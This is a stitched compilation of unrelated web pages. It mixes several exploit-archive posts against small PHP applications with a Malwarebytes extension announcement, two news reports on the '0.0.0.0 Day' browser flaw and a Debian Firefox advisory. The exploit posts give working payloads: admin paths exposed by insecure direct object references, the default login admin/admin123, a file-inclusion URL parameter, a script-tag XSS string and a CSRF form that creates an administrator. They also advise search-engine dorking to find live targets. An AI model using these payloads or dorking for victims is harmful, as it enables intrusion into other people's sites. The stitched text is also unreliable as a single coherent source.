Farmacia Gama version 1.0 suffers from an insecure direct object reference vulnerability.

**Farmacia Gama 1.0 Insecure Direct Object Reference**

Posted Aug 12, 2024

Authored by indoushka

Farmacia Gama version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 03b0ac64f0e5daeb38f4901ddbe680af2e5d9a8749a1b826aadf371e13ec4f05

Download | Favorite | View

**Farmacia Gama 1.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : Farmacia Gama v1.0 IDOR Vulnerability                                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : allows users to access the administrative interface.[+] use payload : /main.php[+] http://127.0.0.1/farmacia-master/main.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,349)
*   Arbitrary (16,870)
*   BBS (2,859)
*   Bypass (1,861)
*   CGI (1,033)
*   Code Execution (7,810)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,390)
*   DoS (25,071)
*   Encryption (2,389)
*   Exploit (53,180)
*   File Inclusion (4,262)
*   File Upload (994)
*   Firewall (822)
*   Info Disclosure (2,890)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,202)
*   Local (14,795)
*   Magazine (586)
*   Overflow (13,169)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,393)
*   Protocol (3,724)
*   Python (1,640)
*   Remote (31,655)
*   Root (3,635)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,027)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,276)
*   SQL Injection (16,609)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,967)
*   Web (9,963)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,250)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,096)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,707)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,485)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,737)
*   UNIX (9,435)
*   UnixWare (187)
*   Windows (6,672)
*   Other

Farmacia Gama 1.0 Insecure Direct Object Reference

Employee Management System version 1.0 suffers from an ignored default credential vulnerability.

**Employee Management System 1.0 Insecure Settings**

Posted Aug 12, 2024

Authored by indoushka

Employee Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 4c729820d6c74d0d245f5de6b7ade8e4cebaa60f462a3e7bd0e326402db59bf4

Download | Favorite | View

**Employee Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Employee Management System v1.0 Insecure Settings Vulnerability                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/16999/employee-management-system.html                                                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,349)
*   Arbitrary (16,870)
*   BBS (2,859)
*   Bypass (1,861)
*   CGI (1,033)
*   Code Execution (7,810)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,390)
*   DoS (25,071)
*   Encryption (2,389)
*   Exploit (53,180)
*   File Inclusion (4,262)
*   File Upload (994)
*   Firewall (822)
*   Info Disclosure (2,890)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,202)
*   Local (14,795)
*   Magazine (586)
*   Overflow (13,169)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,393)
*   Protocol (3,724)
*   Python (1,640)
*   Remote (31,655)
*   Root (3,635)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,027)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,276)
*   SQL Injection (16,609)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,967)
*   Web (9,963)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,250)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,096)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,707)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,485)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,737)
*   UNIX (9,435)
*   UnixWare (187)
*   Windows (6,672)
*   Other

Employee Management System 1.0 Insecure Settings

We wanted to update you on some changes that Google’s making, and what we’re doing in Browser Guard to keep you protected.

We wanted to update you on some changes that Google’s making, and what we’re doing in Browser Guard to keep you protected. 

Some of our customers have recently reported seeing messages that say Browser Guard may soon no longer be supported in their browser. Luckily, there’s no need for you to worry: You’ll continue to get the same Browser Guard protection and experience, we’ve just had to make some adjustments in how we build the extension. 

Today, we brought out the new version of Browser Guard which addresses Google’s changes. If you want to read more of the technical details then you can do so below, or you can head straight over to the Chrome or Edge stores now to update. 

A similar change in Firefox is coming soon and we’ll let you know when it’s ready. 

**What is Google changing? **

For those not familiar with the terms, Google’s Manifest V2 and V3 are the “rules” that browser extension developers are required to follow if they want their extensions to get accepted into the Chrome Web Extension Store.  

Google says Manifest V3 was brought in to improve the security, privacy, performance, and trustworthiness of the extension ecosystem, while still protecting existing functionality. 

The phasing out of Manifest V2 began at the end of May, and the Chrome Web Store no longer accepts Manifest V2 extensions, although browsers can still use them for the time being. 

**How does Manifest V3 affect Browser Guard? **

One of the new changes that impacts Browser Guard and many other ad (and malicious content) blockers is that extensions will be limited in the number of rules they can include. That’s a problem because ad blockers historically rely on a large number of rules. 

Cybercriminals have the habit of setting up new domains by the dozen, and, generally speaking, each blocked domain or subdomain requires one rule. So if ad blockers want to keep up, they too have to continuously create new rules. 

Google has made some compromises after objections were raised when the company first announced Manifest V3, but there are still limitations which have an effect. 

**How Malwarebytes has dealt with this **

The new limitations of Manifest V3 meant we had to develop a different way to block content for our users that use Chromium based browsers like Google Chrome and Microsoft Edge.  

The new Browser Guard uses a mix of static and dynamic rules to protect our users. 

**Static rules** are rules that are contained in the ruleset files which can be seen as block lists. These files are shipped with each version release. 

**Dynamic rules** are rules that can be added and removed at runtime. Chrome allows up to 30,000 dynamic rules. Browser Guard uses dynamic rules for two purposes: 

*   **Session rules** are dynamic rules that can be added and removed at runtime, but they are session-scoped and are cleared when the browser shuts down and when a new version of the browser is installed. 

*   Dynamic rules can be used to store allow lists, user blocked content, and **general rules** that block more than one domain. Take, for example, the IP address of a server that is known to host nothing but phishing sites. 

To deal with urgent situations we can use ruleset overrides, which are a mechanism by which we can override the static rules shipped with Browser Guard without requiring our users to add exclusions. 

Your version of Browser Guard will be automatically updated to the latest version, but if you want to get it now you can do so for Chrome or Edge. 

Thanks for continuing to choose Malwarebytes to protect you.

 Google Manifest V3 and Malwarebytes Browser Guard 

Gaati Track version 1.0-2023 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Gaati track v1.0-2023 IDOR Vulnerability                                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /new_user.php                 /branch_list.php         /parcel_list.php         /reports.php         /sidebar.php         /staff_list.php[+] https://www/127.0.0.1/ks50.karnataka.govin/sidebar.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Gaati Track 1.0-2023 Insecure Direct Object Reference

Farmacia Gama version 1.0 suffers from a file inclusion vulnerability.

    =============================================================================================================================================| # Title     : Farmacia Gama v1.0 File inclusion Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /main.php?id=1&pg=[+] http://127.0.0.1/farmacia-master/main.php?id=1&pg=http://127.0.0.1/phpMyAdmin/themes/pmahomme/img/logo_left.pngGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Farmacia Gama 1.0 File Inclusion 

Employee Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Employee Management System v1.0 CSRF Vulnerability                                                                          |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/php/16999/employee-management-system.html                                                    |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 9.

[+] Set the target site link Save changes and apply . 

[+] infected file : employee_akpoly/Admin/add-admin.php.

[+] http://127.0.0.1/employee_akpoly/Admin/add-admin.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Add Admin</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/employee_akpoly/Admin/add-admin.php" method="POST" enctype="multipart/form-data">  
        <label for="txtusername">Username:</label>  
        <input type="text" id="txtusername" name="txtusername" required><br><br>

        <label for="txtfullname">Full Name:</label>  
        <input type="text" id="txtfullname" name="txtfullname" required><br><br>

        <label for="txtpassword">Password:</label>  
        <input type="password" id="txtpassword" name="txtpassword" required><br><br>

        <label for="txtphone">Phone Number:</label>  
        <input type="text" id="txtphone" name="txtphone" required><br><br>

        <label for="avatar">Avatar:</label>  
        <input type="file" id="avatar" name="avatar" accept="image/*"><br><br>

        <button type="submit" name="btncreate">Create</button>  
    </form>  
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Employee Management System 1.0 Cross Site Request Forgery

E-Commerce Site using PHP PDO version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : E-Commerce Site using PHP PDO v1.0 XSS Vulnerability                                                                        || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/12287/e-commerce-site-using-php-pdo.html                                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /index.php?product=r-series'%22()%26%25<acx><ScRiPt%20>prompt(936967)</ScRiPt>[+] https://www/127.0.0.1/demo/ips-lb.net/index.php?product=r-series'%22()%26%25<acx><ScRiPt%20>prompt(936967)</ScRiPt>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

E-Commerce Site Using PHP PDO 1.0 Cross Site Scripting

Attackers can use a seemingly innocuous IP address to exploit localhost APIs to conduct a range of malicious activity, including unauthorized access to user data and the delivery of malware.

Source: Tada Images via Shutterstock

Attackers can use a flaw that exploits the 0.0.0.0 IP address to remotely execute code on various Web browsers — Chrome, Safari, Firefox, and others — putting users at risk for data theft, malware, and other malicious activity.

Researchers at open source security firm Oligo Security have discovered a way to bypass browser security and interact with services running on an organization's local network from outside the network, that they are calling "0.0.0.0 Day," because of the Web address it exploits.

The vulnerability exists due to "the inconsistent implementation of security mechanisms across different browsers, along with a lack of standardization in the browser industry," Avi Lumesky, an Oligo AI security researcher, revealed in a blog post published this week.

Attackers can use the flaw to exploit localhost application programming interfaces (APIs) from the browser, thus performing a range of malicious activities.

"As a result, the seemingly innocuous IP address, 0.0.0.0, can become a powerful tool for attackers to exploit local services, including those used for development, operating systems, and even internal networks," Lumesky wrote.

**Breaking Down the Flaw**

The flaw lies in the ability by design of browsers for services to send a request to almost any HTTP server using JavaScript; a browser's key job is to focus on delivering the correct response, either by serving up a valid response to a request or an error.

While browsers are generally supposed to prevent errant or malicious requests from getting through via their responses, there has been a lack of streamlined security in handling requests across browsers since their inception.

"For a long time, it was not clear how browsers should behave when they make requests to local or internal networks from less-private contexts," Lumesky explained in the post.

While most browsers have relied on CORS, or Cross-Origin Resource Sharing — a standard defining a way for client Web applications that are loaded in one domain to interact with resources in a different domain — "its performance depends on the response content, so requests are still made and can still be sent," Lumesky noted.

"This is simply not good enough," he wrote. "History proved that a single HTTP request can attack a home router — and if that's all it takes, every user needs to be able to prevent this request from happening at all."

**PNA Bypass**

Chrome's introduction of Private Network Access (PNA) — which goes beyond CORS — should, in theory, protect websites from the 0.0.0.0 day bug. PNA proposes distinguishing between public, private, and local networks, ensuring that "pages loaded under a less-secure context will not be able to communicate with more-secure contexts," Lumesky wrote.

However, Oligo researchers discovered that website requests sent to 0.0.0.0, which should be blocked under PNA, were actually received and processed by local servers. "This means public websites can access any open port on your host without the ability to see the response," Lumesky wrote.

To prove their point, the attackers investigated how ShadowRay, a recent attack campaign its researchers discovered targeting AI workloads, could execute its attack from the browser using 0.0.0.0 as its attack vector.

ShadowRay enabled arbitrary code execution when a private server was unintentionally exposed to the Internet, and went undiscovered for nearly a year. To prove their concept, Oligo researchers ran a local Ray cluster on localhost, then started a socket that is listening to new connections to open a reverse shell.

"Then, the victim clicks on the link in the email, which runs the exploit," Lumesky explained. "The exploit opens a reverse shell for the attacker on the visitor’s machine."

The researchers proved the concept within Chromium, Safari, and Firefox to execute ShadowRay from the browser in "one of an undoubtedly huge number of remote code execution attacks enabled by this approach," Lumesky noted. They also proved the attack via Selenium Grid public servers and PyTorch TorchServe via respective previously identified attack campaigns SeleniumGreed and ShellTorch.

Ultimately, the researchers demonstrated how by using 0.0.0.0 together with mode "no-cors," attackers "can use public domains to attack services running on localhost and even gain arbitrary code execution, all using a single HTTP request," Lumeksy explained.

**How Defenders Can Mitigate Attacks**

Oligo disclosed the findings to the relevant browser owners — including Google, Apple, and Mozilla — which responded by making fixes in their browsers to block 0.0.0.0 as a target IP, according to Oligo.

Meanwhile, as the companies in charge work to streamline security standards across browser offerings, there are other technical mitigations that network administrators can use to thwart attacks using the vector, Lumesky said.

They include implementing PNA headers, verifying the HOST header of the network request to protect against DNS rebinding attacks to localhost or 127.0.0.1, and generally mistrusting localhost networks just because they are "local." "Add a minimal layer of authorization, even when running on localhost," he advised.

Network administrators should also use HTTPS over HTTP whenever possible and implement CSRF tokens in your applications, even if they are local.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

'0.0.0.0 Day' Flaw Puts Chrome, Firefox, Mozilla Browsers at RCE Risk

Cybersecurity researchers have discovered a new "0.0.0.0 Day" impacting all major web browsers that malicious websites could take advantage of to breach local networks.
The critical vulnerability "exposes a fundamental flaw in how browsers handle network requests, potentially granting malicious actors access to sensitive services running on local devices," Oligo Security researcher Avi Lumelsky

Vulnerability / Browser Security

Cybersecurity researchers have discovered a new "0.0.0.0 Day" impacting all major web browsers that malicious websites could take advantage of to breach local networks.

The critical vulnerability "exposes a fundamental flaw in how browsers handle network requests, potentially granting malicious actors access to sensitive services running on local devices," Oligo Security researcher Avi Lumelsky said.

The Israeli application security company said the implications of the vulnerability are far-reaching, and that it stems from the inconsistent implementation of security mechanisms and a lack of standardization across different browsers.

As a result, a seemingly harmless IP address such as 0.0.0.0 could be weaponized to exploit local services, resulting in unauthorized access and remote code execution by attackers outside the network. The loophole is said to have been around since 2006.

0.0.0.0 Day impacts Google Chrome/Chromium, Mozilla Firefox, and Apple Safari that enables external websites to communicate with software that runs locally on MacOS and Linux. It does not affect Windows devices as Microsoft blocks the IP address at the operating system level.

Particularly, Oligo Security found that public websites using domains ending in ".com" are able to communicate with services running on the local network and execute arbitrary code on the visitor's host by using the address 0.0.0.0 as opposed to localhost/127.0.0.1.

It's also a bypass of Private Network Access (PNA), which is designed to prohibit public websites from directly accessing endpoints located within private networks.

Any application that runs on localhost and can be reached via 0.0.0.0 is likely susceptible to remote code execution, including local Selenium Grid instances by dispatching a POST request to 0.0.0\[.\]0:4444 with a crafted payload.

In response to the findings in April 2024, web browsers are expected to block access to 0.0.0.0 completely, thereby deprecating direct access to private network endpoints from public websites.

"When services use localhost, they assume a constrained environment," Lumelsky said. "This assumption, which can (as in the case of this vulnerability) be faulty, results in insecure server implementations."

"By using 0.0.0.0 together with mode 'no-cors,' attackers can use public domains to attack services running on localhost and even gain arbitrary code execution (RCE), all using a single HTTP request."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

0.0.0.0 Day: 18-Year-Old Browser Vulnerability Impacts MacOS and Linux Devices

Debian Linux Security Advisory 5740-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, the bypass of sandbox restrictions or an information leak.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5740-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 07, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2024-7519 CVE-2024-7521 CVE-2024-7522 CVE-2024-7524   
                 CVE-2024-7525 CVE-2024-7526 CVE-2024-7527 CVE-2024-7529   
                 CVE-2024-7531

Multiple security issues have been found in the Mozilla Firefox web  
browser, which could potentially result in the execution of arbitrary  
code, the bypass of sandbox restrictions or an information leak.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 115.14.0esr-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 115.14.0esr-1~deb12u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmazJNEACgkQEMKTtsN8  
Tjbc0A/+ND/PqMdzy6m7syWycmZMYbI+i19RSJHC75rwT3MgVB0U8WkRD1EPe7Uw  
IAYoOJ2zzE8FkgjEgQBwv7S3krhl888NgbRtyFZAX41UjyoZZ4q2T+N0h9DICPcb  
EcuaJCrvai4AsVIK2MXzBza8he1emof0tqXTFTyDpZtiui6fW7sEDL/4TPbaU/+7  
MlM7fjtPnCOBrkxGY7dpnfLX3AlFsbxcpe2cRnCQ/CoAGTJ2/grCGucgFLPHDSut  
rnTXWMzT0H1iXXdEJ688Nl6D50+nNmovzoyCTw3ZGsB/fSAUiFM0Lp0Ct31uLy5l  
uLT4hOEgM1FZGkEmf0mW4Ugwajv161o4uTLJMViai3MGNw+A5G040yAgdgn4ohQn  
Ew1o+im9qLw+pimte8OpixYzJHWw4KPouzJH7SZrlLTilrhDlC22EKE9F6jD0QF2  
9ay/pEbkF6AT4HSgguUzb/6DR21sjkM4x70P6cNYJO6Jak+IMtG4Qp35YIsdO9cn  
0W/nWz5FjtlwvQrCusQ49JM/N23TlFsB2y2+NfCADZb6Q4OkGhRLB9mtdZQUXWOT  
JgsYj9/+pNNkkHQcllPGgSXbtddyxE0OMehN2eWrN/kjcIS6XwxI0j+8eZbY5fcM  
yVdgH2foNnvtPnKCTT3qdq2poLCkvVFNrAyMKCXwkOxTZ1FY5fg=  
=i/4D  
-----END PGP SIGNATURE-----

Tag

#firefox